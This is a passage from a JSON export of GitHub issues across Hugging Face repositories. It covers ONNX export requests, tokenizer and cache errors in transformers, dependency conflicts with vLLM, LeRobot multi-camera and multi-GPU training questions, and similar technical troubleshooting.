ai-toolkit is 0.35.0 dev3", "url": "https://github.com/huggingface/diffusers/issues/12044", "state": "closed", "labels": [], "created_at": "2025-08-02T01:37:30Z", "updated_at": "2025-08-21T01:27:19Z", "comments": 3, "user": "qngv" }, { "repo": "huggingface/optimum", "number": 2333, "title": "Support for exporting t5gemma-2b-2b-prefixlm-it to onnx", "body": "### Feature request\n\nI\u2019ve tried to export t5gemma-2b-2b-prefixlm-it to onnx using optimum. But it outputs: ValueError: Trying to export a t5gemma model, that is a custom or unsupported architecture, but no custom onnx configuration was passed as `custom_onnx_configs`. Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the model type t5gemma to be supported natively in the ONNX export.\n\nTask: \"text2text-generation\"\n\n### Motivation\n\nI\u2019ve tried, but nothing works...\n\n### Your contribution\n\nconfig.json\n\n{\n \"architectures\": [\n \"T5GemmaForConditionalGeneration\"\n ],\n \"classifier_dropout_rate\": 0.0,\n \"decoder\": {\n \"attention_bias\": false,\n \"attention_dropout\": 0.0,\n \"attn_logit_softcapping\": 50.0,\n \"classifier_dropout_rate\": 0.0,\n \"cross_attention_hidden_size\": 2304,\n \"dropout_rate\": 0.0,\n \"final_logit_softcapping\": 30.0,\n \"head_dim\": 256,\n \"hidden_activation\": \"gelu_pytorch_tanh\",\n \"hidden_size\": 2304,\n \"initializer_range\": 0.02,\n \"intermediate_size\": 9216,\n \"is_decoder\": true,\n \"layer_types\": [\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\"\n ],\n \"max_position_embeddings\": 8192,\n \"model_type\": \"t5_gemma_module\",\n \"num_attention_heads\": 8,\n \"num_hidden_layers\": 26,\n \"num_key_value_heads\": 4,\n \"query_pre_attn_scalar\": 256,\n \"rms_norm_eps\": 1e-06,\n \"rope_theta\": 10000.0,\n \"sliding_window\": 4096,\n \"torch_dtype\": \"bfloat16\",\n \"use_cache\": true,\n \"vocab_size\": 256000\n },\n \"dropout_rate\": 0.0,\n \"encoder\": {\n \"attention_bias\": false,\n \"attention_dropout\": 0.0,\n \"attn_logit_softcapping\": 50.0,\n \"classifier_dropout_rate\": 0.0,\n \"dropout_rate\": 0.0,\n \"final_logit_softcapping\": 30.0,\n \"head_dim\": 256,\n \"hidden_activation\": \"gelu_pytorch_tanh\",\n \"hidden_size\": 2304,\n \"initializer_range\": 0.02,\n \"intermediate_size\": 9216,\n \"layer_types\": [\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\",\n \"sliding_attention\",\n \"full_attention\"\n ],\n \"max_position_embeddings\": 8192,\n \"model_type\": \"t5_gemma_module\",\n \"num_attention_heads\": 8,\n \"num_hidden_layers\": 26,\n \"num_key_value_heads\": 4,\n \"query_pre_attn_scalar\": 256,\n \"rms_norm_eps\": 1e-06,\n \"rope_theta\": 10000.0,\n \"sliding_window\": 4096,\n \"torch_dtype\": \"bfloat16\",\n \"use_cache\": true,\n \"vocab_size\": 256000\n },\n \"eos_token_id\": [\n 1,\n 107\n ],\n \"initializer_range\": 0.02,\n \"is_encoder_decoder\": true,\n \"model_type\": \"t5gemma\",\n \"pad_token_id\": 0,\n \"torch_dtype\": \"bfloat16\",\n \"transformers_version\": \"4.53.0.dev0\",\n \"use_cache\": true\n}", "url": "https://github.com/huggingface/optimum/issues/2333", "state": "closed", "labels": [ "Stale" ], "created_at": "2025-08-01T16:39:52Z", "updated_at": "2026-01-03T02:51:13Z", "comments": 2, "user": "botan-r" }, { "repo": "huggingface/transformers", "number": 39842, "title": "Expected behavior of `compute_result` is hard to expect and inconsistent", "body": "In trainer there exists a parameter `compute_result` given to `compute_metrics` when `batch_eval_metrics` is given to True.\n\nhttps://github.com/huggingface/transformers/blob/1e0665a191f73f6b002209c3dfcda478baac6bac/src/transformers/trainer.py#L370-L375\n\nI think there are several problems for `compute_result`,\n1. User can't expect (1) what happen if `batch_eval_metrics` is given (2) what is given to `compute_result` and when it change from True or False (3) what's HF's intention to implement `compute_metrics` with `compute_result`. since there are very few (only 3 line) instruction for this.\n2. `compute_metrics` sometimes called with `compute_result` and sometimes not, EVEN WHEN `batch_eval_metrics` is present. See below lines. \n\nhttps://github.com/huggingface/transformers/blob/1e0665a191f73f6b002209c3dfcda478baac6bac/src/transformers/trainer.py#L4534-L4547\n\nCreating this issue because I spend long time figuring out this.", "url": "https://github.com/huggingface/transformers/issues/39842", "state": "closed", "labels": [], "created_at": "2025-08-01T11:43:28Z", "updated_at": "2025-10-04T08:02:41Z", "comments": 3, "user": "MilkClouds" }, { "repo": "huggingface/transformers", "number": 39841, "title": "MistralCommonTokenizer does not match PreTrainedTokenizer", "body": "### System Info\n\non docker\nos: ubuntu 24.04\ntransformers: 4.55.0.dev0\nmistral_common: 1.8.3\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nCommand to lauch container:\n\n```bash\ndocker run --gpus all -p 8000:8000 --ipc=host vllm/vllm-openai:latest --model mistralai/Voxtral-Mini-3B-2507\n```\n\n\n### Expected behavior\n\nThe output will finish in:\n\n```bash\nvllm-1 | File \"/usr/local/lib/python3.12/dist-packages/vllm/transformers_utils/tokenizer_group.py\", line 24, in __init__ \nvllm-1 | self.tokenizer = get_tokenizer(self.tokenizer_id, **tokenizer_config)\nvllm-1 | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nvllm-1 | File \"/usr/local/lib/python3.12/dist-packages/vllm/transformers_utils/tokenizer.py\", line 309, in get_tokenizer\nvllm-1 | tokenizer = get_cached_tokenizer(tokenizer)\nvllm-1 | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nvllm-1 | File \"/usr/local/lib/python3.12/dist-packages/vllm/transformers_utils/tokenizer.py\", line 104, in get_cached_tokenizer\nvllm-1 | tokenizer_all_special_tokens = tokenizer.all_special_tokens\nvllm-1 | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nvllm-1 | AttributeError: 'MistralCommonTokenizer' object has no attribute 'all_special_tokens'. Did you mean: '_all_special_ids'?\n```\n\nvLLM docker server uses the pretrained tokenizer format:\nhttps://github.com/vllm-project/vllm/blob/49314869887e169be080201ab8bcda14e745c080/vllm/transformers_utils/tokenizer.py#L97-L101\n\nWhich must include: `all_special_ids`, `all_special_tokens`, `all_special_tokens_extended` default properties. However, MistralCommonTokenizer does not have implemented them. Is there a plan to standarize both tokenizers?\n", "url": "https://github.com/huggingface/transformers/issues/39841", "state": "closed", "labels": [ "bug" ], "created_at": "2025-08-01T09:16:24Z", "updated_at": "2025-11-23T08:03:33Z", "comments": 3, "user": "Fhrozen" }, { "repo": "huggingface/transformers", "number": 39839, "title": "pack_image_features RuntimeError when vision_feature_select_strategy=\"full\"", "body": "### System Info\n\ntransformers 4.54.0\n\n### Who can help?\n\n@zucchini-nlp \n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n```\nfrom transformers.models.llava_next import LlavaNextForConditionalGeneration, LlavaNextProcessor\nfrom PIL import Image\nimport requests\nimport torch\n\nmodel = LlavaNextForConditionalGeneration.from_pretrained(\n \"llava-hf/llava-v1.6-vicuna-7b-hf\", \n vision_feature_select_strategy=\"full\",\n torch_dtype=torch.float16,\n device_map=\"auto\",\n )\nprocessor = LlavaNextProcessor.from_pretrained(\"llava-hf/llava-v1.6-vicuna-7b-hf\")\n\nimage = Image.open(\"/data/coco/train2017/000000000009.jpg\")\nprompt = \"USER: \\nWhat is shown in this image? ASSISTANT:\"\ninputs = processor(images=image, text=prompt, truncation=True, return_tensors=\"pt\", vision_feature_select_strategy = \"full\").to(\"cuda\")\n\ninput_embeds = model(inputs.input_ids, pixel_values=inputs.pixel_values, image_sizes=inputs.image_sizes, vision_feature_select_strategy=\"full\")\n```\n\n### Expected behavior\n\nI encountered a bug when running to the line \n`input_embeds = model(inputs.input_ids, pixel_values=inputs.pixel_values, image_sizes=inputs.image_sizes, vision_feature_select_strategy=\"full\")`\nI got:\n```\n in pack_image_features\n image_feature = image_feature.view(num_patch_height, num_patch_width, height, width, -1)\nRuntimeError: shape '[2, 2, 24, 24, -1]' is invalid for input of size 9453568\n```\n\n\nthe shape of image_feature is [4, 577, 4096] currently, I want to know how to fix this?", "url": "https://github.com/huggingface/transformers/issues/39839", "state": "closed", "labels": [ "bug" ], "created_at": "2025-08-01T07:55:40Z", "updated_at": "2025-09-08T08:02:56Z", "comments": 2, "user": "llnnnnnn" }, { "repo": "huggingface/gsplat.js", "number": 117, "title": "How to generate a Mesh mesh?", "body": "I need a scene where Gaussian Splatting and Mesh are mixed, and I don't know if GSPLAT generates Mesh or not.", "url": "https://github.com/huggingface/gsplat.js/issues/117", "state": "open", "labels": [], "created_at": "2025-08-01T03:29:22Z", "updated_at": "2025-08-01T03:29:22Z", "user": "ZXStudio" }, { "repo": "huggingface/diffusers", "number": 12038, "title": "Dataset structure for train_text_to_image_lora.py", "body": "Hello. I am trying to use **train_text_to_image_lora.py** script following the instructions https://github.com/huggingface/diffusers/tree/main/examples/text_to_image\n\nI get errors on data structure and don't know what is the issue on my side.\nI have a folder **data** where I have folder **image** and **csv** file.\n\nC:/Users/XXX//data/\n\n\u251c\u2500\u2500 images/\n\u2502 \u251c\u2500\u2500 image1.jpg\n\u2502 \u251c\u2500\u2500 image2.jpg\n\u2502 \u2514\u2500\u2500 ...\n\u2514\u2500\u2500 captions.csv\n\n**Image** folder contain images and **csv** file contains two columns (image names and captions)\n\nimage, caption\nimage1.jpg, A dragon flying through fire\nimage2.jpg, A knight in shining armor\n\nPlease can you let me know how I should organize my dataset to be able to run the training.\n", "url": "https://github.com/huggingface/diffusers/issues/12038", "state": "open", "labels": [], "created_at": "2025-07-31T16:10:38Z", "updated_at": "2025-08-01T16:44:48Z", "comments": 1, "user": "HripsimeS" }, { "repo": "huggingface/lerobot", "number": 1632, "title": "Are there plans to support distributed training?", "body": "[train.py](https://github.com/huggingface/lerobot/blob/main/src/lerobot/scripts/train.py) currently only supports single-GPU training. Is there a plan to support distributed training in the future?", "url": "https://github.com/huggingface/lerobot/issues/1632", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-07-31T03:31:46Z", "updated_at": "2025-10-17T12:10:40Z", "user": "Hukongtao" }, { "repo": "huggingface/candle", "number": 3039, "title": "Request support for Qwen2.5-vl or Fast-VLM", "body": "I'm trying to call some image-to-text visual models using candle, if anyone knows how to use Qwen2.5-vl or Fast-VLM, can you share it? Appreciate", "url": "https://github.com/huggingface/candle/issues/3039", "state": "open", "labels": [], "created_at": "2025-07-31T02:41:33Z", "updated_at": "2025-08-04T12:21:35Z", "comments": 1, "user": "826327700" }, { "repo": "huggingface/transformers", "number": 39801, "title": "ValueError: This model does not support cache_implementation='static'. Please check the following issue: https://github.com/huggingface/transformers/issues/28981", "body": "### System Info\n\n_prepare_cache_for_generation\n raise ValueError(\nValueError: This model does not support cache_implementation='static'. Please check the following issue: https://github.com/huggingface/transformers/issues/28981\n\nI got this error and i have no clue of how to solve it. I tried different implementations from different people and I always have the same problem.\n\nI used this code: https://mer.vin/2024/11/finetune-llama-3-2-vision-radiology-images/\n\n\nimport os\nfrom unsloth import FastVisionModel\nimport torch\nfrom datasets import load_dataset\nfrom transformers import TextStreamer\nfrom unsloth import is_bf16_supported\nfrom unsloth.trainer import UnslothVisionDataCollator\nfrom trl import SFTTrainer, SFTConfig\n\n# 1. Load the model\n\nmodel, tokenizer = FastVisionModel.from_pretrained(\n \"unsloth/Llama-3.2-11B-Vision-Instruct\",\n load_in_4bit = True,\n use_gradient_checkpointing = \"unsloth\",\n)\n\nmodel = FastVisionModel.get_peft_model(\n model,\n finetune_vision_layers = True,\n finetune_language_layers = True,\n finetune_attention_modules = True,\n finetune_mlp_modules = True,\n r = 16,\n lora_alpha = 16,\n lora_dropout = 0,\n bias = \"none\",\n random_state = 3407,\n use_rslora = False,\n loftq_config = None,\n)\n\n# 2. Load the dataset\n\ndataset = load_dataset(\"unsloth/Radiology_mini\", split = \"train\")\ninstruction = \"You are an expert radiographer. Describe accurately what you see in this image.\"\n\ndef convert_to_conversation(sample):\n conversation = [\n { \"role\": \"user\",\n \"content\" : [\n {\"type\" : \"text\", \"text\" : instruction},\n {\"type\" : \"image\", \"image\" : sample[\"image\"]} ]\n },\n { \"role\" : \"assistant\",\n \"content\" : [\n {\"type\" : \"text\", \"text\" : sample[\"caption\"]} ]\n },\n ]\n return { \"messages\" : conversation }\npass\n\nconverted_dataset = [convert_to_conversation(sample) for sample in dataset]\n\n# 3. Before training\n\nFastVisionModel.for_inference(model)\nimage = dataset[0][\"image\"]\ninstruction = \"You are an expert radiographer. Describe accurately what you see in this image.\"\n\nmessages = [\n {\"role\": \"user\", \"content\": [\n {\"type\": \"image\"},\n {\"type\": \"text\", \"text\": instruction}\n ]}\n]\ninput_text = tokenizer.apply_chat_template(messages, add_generation_prompt = True)\ninputs = tokenizer(\n image,\n input_text,\n add_special_tokens = False,\n return_tensors = \"pt\",\n).to(\"cuda\")\n\nprint(\"\\nBefore training:\\n\")\n\ntext_streamer = TextStreamer(tokenizer, skip_prompt = True)\n_ = model.generate(**inputs, streamer = text_streamer, max_new_tokens = 128,\n use_cache = True, temperature = 1.5, min_p = 0.1)\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\npip install unsloth\nexport HF_TOKEN=xxxxxxxxxxxxx\n\n### Expected behavior\n\nStart fine-tuning", "url": "https://github.com/huggingface/transformers/issues/39801", "state": "closed", "labels": [ "bug" ], "created_at": "2025-07-30T20:59:45Z", "updated_at": "2025-09-07T08:02:42Z", "comments": 2, "user": "jpitalopez" }, { "repo": "huggingface/lerobot", "number": 1631, "title": "\ud83e\udd5a Filtering Eggs on Moving Table: Dirt/Breakage Detection Feasibility", "body": "Hi \ud83d\udc4b\n\nThanks a lot for your work on lerobot!\n\nI am exploring the use of lerobot to filter eggs based on dirt or breakage while they move past the robot on a conveyor table. The goal is to detect anomalies in real time and eventually eject faulty eggs.\n\nSome specific questions I have:\n\n* Do you have any advice or feedback on using lerobot in this kind of setup?\n* Are there known pros/cons with fast-moving objects and image-based anomaly detection?\n* Would it make sense to multiply robots along the line (e.g., several cameras/models at different angles or points)?\n* Is there support or a best practice for triggering actions (e.g. pneumatic ejection) once a faulty egg is detected?\n\nI am happy to fine-tune a model or adapt an existing one if that\u2019s viable. \n\nAny insights would be super helpful \ud83d\ude4f\n\nThanks again!", "url": "https://github.com/huggingface/lerobot/issues/1631", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-07-30T18:35:12Z", "updated_at": "2025-08-12T09:07:41Z", "user": "KannarFr" }, { "repo": "huggingface/optimum", "number": 2330, "title": "Patch Release to support `transformers~=4.53`", "body": "### System Info\n\n```shell\noptimum[onnxruntime-gpu]==1.26.1\ntorch==2.7.1\nvllm==0.10.0\n\ndocker run --rm -it --platform linux/amd64 ghcr.io/astral-sh/uv:debian bash\n```\n\n### Who can help?\n\n@JingyaHuang @echarlaix\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\nThe latest release is more than 1 month old. It supports `transformers>=4.36,<4.53.0` with `onnxruntime-gpu` extra. This is incompatible with `vllm==0.10.0`, which requires `transformers>=4.53.2`. `vllm==0.10.0` is required to use with `torch==2.7.1`. My system is required to use `torch==2.7.1` due to the medium CVE in previous versions.\nhttps://nvd.nist.gov/vuln/detail/CVE-2025-2953\n\nIn the current main branch, the requirements has been changed to `transformers>=4.36,<4.54.0`, which would mitigate the issue.\n\nIs it possible to create a patch release based on the current main branch?\n\n```bash\n> uv pip compile <(echo \"optimum[onnxruntime-gpu]>=1.23\"; echo \"vllm>=0.10\")\n x No solution found when resolving dependencies:\n `-> Because only the following versions of optimum[onnxruntime-gpu] are available:\n optimum[onnxruntime-gpu]<=1.23.0\n optimum[onnxruntime-gpu]==1.23.1\n optimum[onnxruntime-gpu]==1.23.2\n optimum[onnxruntime-gpu]==1.23.3\n optimum[onnxruntime-gpu]==1.24.0\n optimum[onnxruntime-gpu]==1.25.0\n optimum[onnxruntime-gpu]==1.25.1\n optimum[onnxruntime-gpu]==1.25.2\n optimum[onnxruntime-gpu]==1.25.3\n optimum[onnxruntime-gpu]==1.26.0\n optimum[onnxruntime-gpu]==1.26.1\n and optimum[onnxruntime-gpu]>=1.23.0,<=1.23.2 depends on transformers<4.46.0, we can conclude that optimum[onnxruntime-gpu]>=1.23.0,<1.23.1\n depends on transformers<4.46.0.\n And because optimum[onnxruntime-gpu]>=1.23.1,<=1.23.2 depends on transformers<4.46.0 and transformers<4.46.0, we can conclude that\n optimum[onnxruntime-gpu]>=1.23.0,<1.23.3 depends on transformers<4.46.0.\n And because optimum[onnxruntime-gpu]==1.23.3 depends on transformers<4.47.0 and transformers>=4.36,<4.49.0, we can conclude that\n optimum[onnxruntime-gpu]>=1.23.0,<1.25.0 depends on transformers<4.49.0.\n And because optimum[onnxruntime-gpu]>=1.25.0,<=1.25.3 depends on transformers>=4.36,<4.52.0 and transformers>=4.36,<4.52.0, we can conclude that\n optimum[onnxruntime-gpu]>=1.23.0,<1.25.2 depends on transformers<4.52.0.\n And because optimum[onnxruntime-gpu]>=1.25.2,<=1.25.3 depends on transformers>=4.36,<4.52.0 and transformers>=4.36,<4.52.0, we can conclude that\n optimum[onnxruntime-gpu]>=1.23.0,<1.26.0 depends on transformers<4.52.0.\n And because optimum[onnxruntime-gpu]>=1.26.0 depends on transformers>=4.36,<4.53.0 and transformers>=4.36,<4.53.0, we can conclude that\n optimum[onnxruntime-gpu]>=1.23.0 depends on transformers<4.53.0.\n And because vllm==0.10.0 depends on transformers>=4.53.2 and only vllm<=0.10.0 is available, we can conclude that vllm>=0.10.0 and\n optimum[onnxruntime-gpu]>=1.23.0 are incompatible.\n And because you require optimum[onnxruntime-gpu]>=1.23 and vllm>=0.10.0, we can conclude that your requirements are unsatisfiable.\n```\n\n### Expected behavior\n\nAble to install `optimum[onnxruntime-gpu]>=1.26` and `vllm>=0.10.0`.\n```bash\n> uv pip compile <(echo \"optimum[onnxruntime-gpu] @ git+https://github.com/huggingface/optimum@689c0b5d38aabe265ab1eb334a6ca5bc3ca3574d\"; echo \"vllm>=0.10\")\nResolved 152 packages in 359ms\n# This file was autogenerated by uv via the following command:\n# uv pip compile /dev/fd/63\naiohappyeyeballs==2.6.1\n # via aiohttp\naiohttp==3.12.15\n # via\n # fsspec\n # vllm\naiosignal==1.4.0\n # via aiohttp\nannotated-types==0.7.0\n # via pydantic\nanyio==4.9.0\n # via\n # httpx\n # openai\n # starlette\n # watchfiles\nastor==0.8.1\n # via depyf\nattrs==25.3.0\n # via\n # aiohttp\n # jsonschema\n # referencing\nblake3==1.0.5\n # via vllm\ncachetools==6.1.0\n # via vllm\ncbor2==5.6.5\n # via vllm\ncertifi==2025.7.14\n # via\n # httpcore\n # httpx\n # requests\n # sentry-sdk\ncffi==1.17.1\n # via soundfile\ncharset-normalizer==3.4.2\n # via requests\nclick==8.2.1\n # via\n # ray\n # rich-toolkit\n # typer\n # uvicorn\ncloudpickle==3.1.1\n # via vllm\ncoloredlogs==15.0.1\n # via onnxruntime-gpu\ncompressed-tensors==0.10.2\n # via vllm\ncupy-cuda12x==13.5.1\n # via ray\ndatasets==4.0.0\n # via optimum\ndepyf==0.19.0\n # via vllm\ndill==0.3.8\n # via\n # datasets\n # depyf\n # multiprocess\ndiskcache==5.6.3\n # via vllm\ndistro==1.9.0\n # via openai\ndnspython==2.7.0\n # via email-validator\neinops==0.8.1\n # via vllm\nemail-validator==2.2.0\n # via\n # fastapi\n # pydantic", "url": "https://github.com/huggingface/optimum/issues/2330", "state": "closed", "labels": [ "bug" ], "created_at": "2025-07-30T02:40:41Z", "updated_at": "2025-07-31T02:54:31Z", "comments": 1, "user": "yxtay" }, { "repo": "huggingface/lerobot", "number": 1622, "title": "Why is LeRobot\u2019s policy ignoring additional camera streams despite custom `input_features`?", "body": "I'm training a SO101 arm policy with 3 video streams (`front`, `above`, `gripper`) and a state vector. The dataset can be found at this [link](https://huggingface.co/datasets/aaron-ser/SO101-Dataset/tree/main). \n\nI created a custom JSON config (the `train_config.json` below) that explicitly lists the three visual streams under `policy.input_features`, and despite disabling the preset config loading with `\"use_policy_training_preset\": false`, the policy never takes into account any feed that isn't the front observations. Disabling the preset however is not mandatory as previous hackathons with multiple streams such as the [following](https://huggingface.co/LeRobot-worldwide-hackathon/91-AM-PM-smolvla-pouring-liquid/blob/main/train_config.json) used the preset config. \n\nI pass into `lerobot.scripts.train` the `train_config.json` file shared below with the `--config_path` parameter. Although the initial printout of the config is correct with all three streams, after training finishes, the saved `train_config.json` file inside `aaron-ser/SO101-Model` only contains:\n\n**aaron-ser/SO101-Model train_config.json snippet**\n```\n\"input_features\": {\n \"observation.state\": { ... },\n \"observation.images.front\": { ... },\n\"output_features\": { ... }\n```\n\nDropping the `above` and `gripper` streams although the HF dataset includes all three streams and I explicitly passed them in the JSON file. \n\nWhat internal step or configuration is overriding my custom `input_features` and keeping only the front camera? How can I ensure LeRobot trains on all provided video streams?\n\n**train_config.json**\n```\n{\n \"dataset\": {\n \"repo_id\": \"aaron-ser/SO101-Dataset\",\n \"root\": null,\n \"episodes\": null,\n \"image_transforms\": {\n \"enable\": false,\n \"max_num_transforms\": 3,\n \"random_order\": false,\n \"tfs\": {\n \"brightness\": {\n \"weight\": 1.0,\n \"type\": \"ColorJitter\",\n \"kwargs\": {\n \"brightness\": [\n 0.8,\n 1.2\n ]\n }\n },\n \"contrast\": {\n \"weight\": 1.0,\n \"type\": \"ColorJitter\",\n \"kwargs\": {\n \"contrast\": [\n 0.8,\n 1.2\n ]\n }\n },\n \"saturation\": {\n \"weight\": 1.0,\n \"type\": \"ColorJitter\",\n \"kwargs\": {\n \"saturation\": [\n 0.5,\n 1.5\n ]\n }\n },\n \"hue\": {\n \"weight\": 1.0,\n \"type\": \"ColorJitter\",\n \"kwargs\": {\n \"hue\": [\n -0.05,\n 0.05\n ]\n }\n },\n \"sharpness\": {\n \"weight\": 1.0,\n \"type\": \"SharpnessJitter\",\n \"kwargs\": {\n \"sharpness\": [\n 0.5,\n 1.5\n ]\n }\n }\n }\n },\n \"revision\": null,\n \"use_imagenet_stats\": true,\n \"video_backend\": \"torchcodec\"\n },\n \"env\": null,\n \"policy\": {\n \"type\": \"act\",\n \"n_obs_steps\": 1,\n \"normalization_mapping\": {\n \"VISUAL\": \"MEAN_STD\",\n \"STATE\": \"MEAN_STD\",\n \"ACTION\": \"MEAN_STD\"\n },\n \"input_features\": {\n \"observation.state\": {\n \"type\": \"STATE\",\n \"shape\": [\n 6\n ]\n },\n \"observation.images.front\": {\n \"type\": \"VISUAL\",\n \"shape\": [\n 3,\n 720,\n 1280\n ]\n },\n \"observation.images.above\": {\n \"type\": \"VISUAL\",\n \"shape\": [\n 3,\n 720,\n 1280\n ]\n },\n \"observation.images.gripper\": {\n \"type\": \"VISUAL\",\n \"shape\": [\n 3,\n 720,\n 1280\n ]\n }\n },\n \"output_features\": {\n \"action\": {\n \"type\": \"ACTION\",\n \"shape\": [\n 6\n ]\n }\n },\n \"device\": \"cuda\",\n \"use_amp\": false,\n \"push_to_hub\": true,\n \"repo_id\": \"aaron-ser/SO101-Model\",\n \"private\": null,\n \"tags\": null,\n \"license\": null,\n ", "url": "https://github.com/huggingface/lerobot/issues/1622", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-07-29T14:07:14Z", "updated_at": "2025-09-23T14:01:54Z", "user": "Aaron-Serpilin" }, { "repo": "huggingface/trl", "number": 3797, "title": "How to view the training parameters after training is completed", "body": "How to view the training parameters after training is completed\uff1fI am using GRPOTrainer for training, but after training multiple times, I have forgotten the parameters I set. How can I view the saved training parameters?", "url": "https://github.com/huggingface/trl/issues/3797", "state": "open", "labels": [ "\u2753 question", "\ud83c\udfcb GRPO" ], "created_at": "2025-07-29T09:42:52Z", "updated_at": "2025-07-29T13:07:50Z", "user": "Tuziking" }, { "repo": "huggingface/optimum", "number": 2329, "title": "Support for exporting paligemma to onnx", "body": "### Feature request\n\nI\u2019ve tried to export google/paligemma-3b-mix-224 to onnx using optimum. But it outputs: \"ValueError: Trying to export a paligemma model, that is a custom or unsupported architecture, but no custom onnx configuration was passed as custom_onnx_configs. Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. Please open an \nissue at https://github.com/huggingface/optimum/issues if you would like the model type paligemma to be supported natively in the ONNX export.\"\n\n### Motivation\n\nI\u2019ve tried everything but nothing works =(\n(Using custom configs, using torch.onnx.export, etc)\n\n### Your contribution\n\nActually, it seems to me that I can\u2019t help\u2026 =(", "url": "https://github.com/huggingface/optimum/issues/2329", "state": "closed", "labels": [ "Stale" ], "created_at": "2025-07-29T08:58:41Z", "updated_at": "2025-09-06T02:04:25Z", "comments": 2, "user": "DashaMed555" }, { "repo": "huggingface/transformers", "number": 39744, "title": "_supports_static_cache disappear", "body": "### System Info\n\ntransformers main branch\n\n### Who can help?\n\n@ArthurZucker \n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nI see the attr `_supports_static_cache` disappeared in the model. I used to check if `model._supports_static_cache` before setting `cache_implementation=True`. For now, can I assume all models support static cache?\n\n### Expected behavior\n\nAll models support static cache as `_supports_static_cache` is deprecated. Or do we have other method to check if the model support static cache?", "url": "https://github.com/huggingface/transformers/issues/39744", "state": "closed", "labels": [ "bug" ], "created_at": "2025-07-29T02:36:04Z", "updated_at": "2025-07-29T08:17:00Z", "comments": 4, "user": "jiqing-feng" }, { "repo": "huggingface/lerobot", "number": 1607, "title": "how to control a so-101 with trained ACT model?", "body": "https://huggingface.co/initie/test_pick_result \nThis is my pre-trained model for grabbing the switch on the desk by ACT model.\nHow to run this policy model on the Anaconda?\nAlready by way of example, \n\npython -m lerobot.record --robot.type=so101_follower \n--robot.port=COM3 \n--robot.id=ammd_follower_arm \n--robot.cameras=\"{ front: {type: opencv, index_or_path: 0, width: 640, height: 480, fps: 30}, side: {type: opencv, index_or_path: 1, width: 640, height: 480, fps: 30} }\" \n--display_data=True \n--dataset.repo_id=\"initie/eval_test_pick\" \n--dataset.single_task=\"Grab the switch\" \n--policy.path=initie/test_pick_result \n--teleop.type=so101_leader --teleop.port=COM5 \n--teleop.id=ammd_leader_arm --dataset.reset_time_s=5\n\nThis is the example code from Lerobot tutorial, but when i run these codes, I had to record 10 episodes again.\nI just wanna run a pre-trained model, not record an episode again. I'm curious about a simple code that only \"runs\" that model not including recording", "url": "https://github.com/huggingface/lerobot/issues/1607", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-07-28T05:23:24Z", "updated_at": "2025-10-15T03:28:50Z", "user": "initia1013" }, { "repo": "huggingface/lerobot", "number": 1602, "title": "How to perform multi-GPU training for SMoVLA?", "body": "I noticed that the paper used 4 GPUs for pretraining, but the current training code doesn\u2019t seem to support it. Could you provide the corresponding code?", "url": "https://github.com/huggingface/lerobot/issues/1602", "state": "closed", "labels": [], "created_at": "2025-07-27T09:46:04Z", "updated_at": "2025-07-28T08:40:01Z", "user": "QZepHyr" }, { "repo": "huggingface/hmtl", "number": 72, "title": "How to create a website ", "body": "", "url": "https://github.com/huggingface/hmtl/issues/72", "state": "open", "labels": [], "created_at": "2025-07-27T09:30:22Z", "updated_at": "2025-07-27T09:30:22Z", "user": "Chi23-ike" }, { "repo": "huggingface/text-generation-inference", "number": 3304, "title": "using trtllm-build instead of optimum-nvidia for engine building or optimum-nvidia wrong version ?", "body": "\nHello,\n\nI'm experiencing significant issues when trying to use Text Generation Inference (TGI) with TensorRT-LLM as the backend.\n\n**Problem 1: Version Compatibility**\nI cannot use the latest version of TGI due to a known bug (see: https://github.com/huggingface/text-generation-inference/issues/3296).\n\nI'm therefore 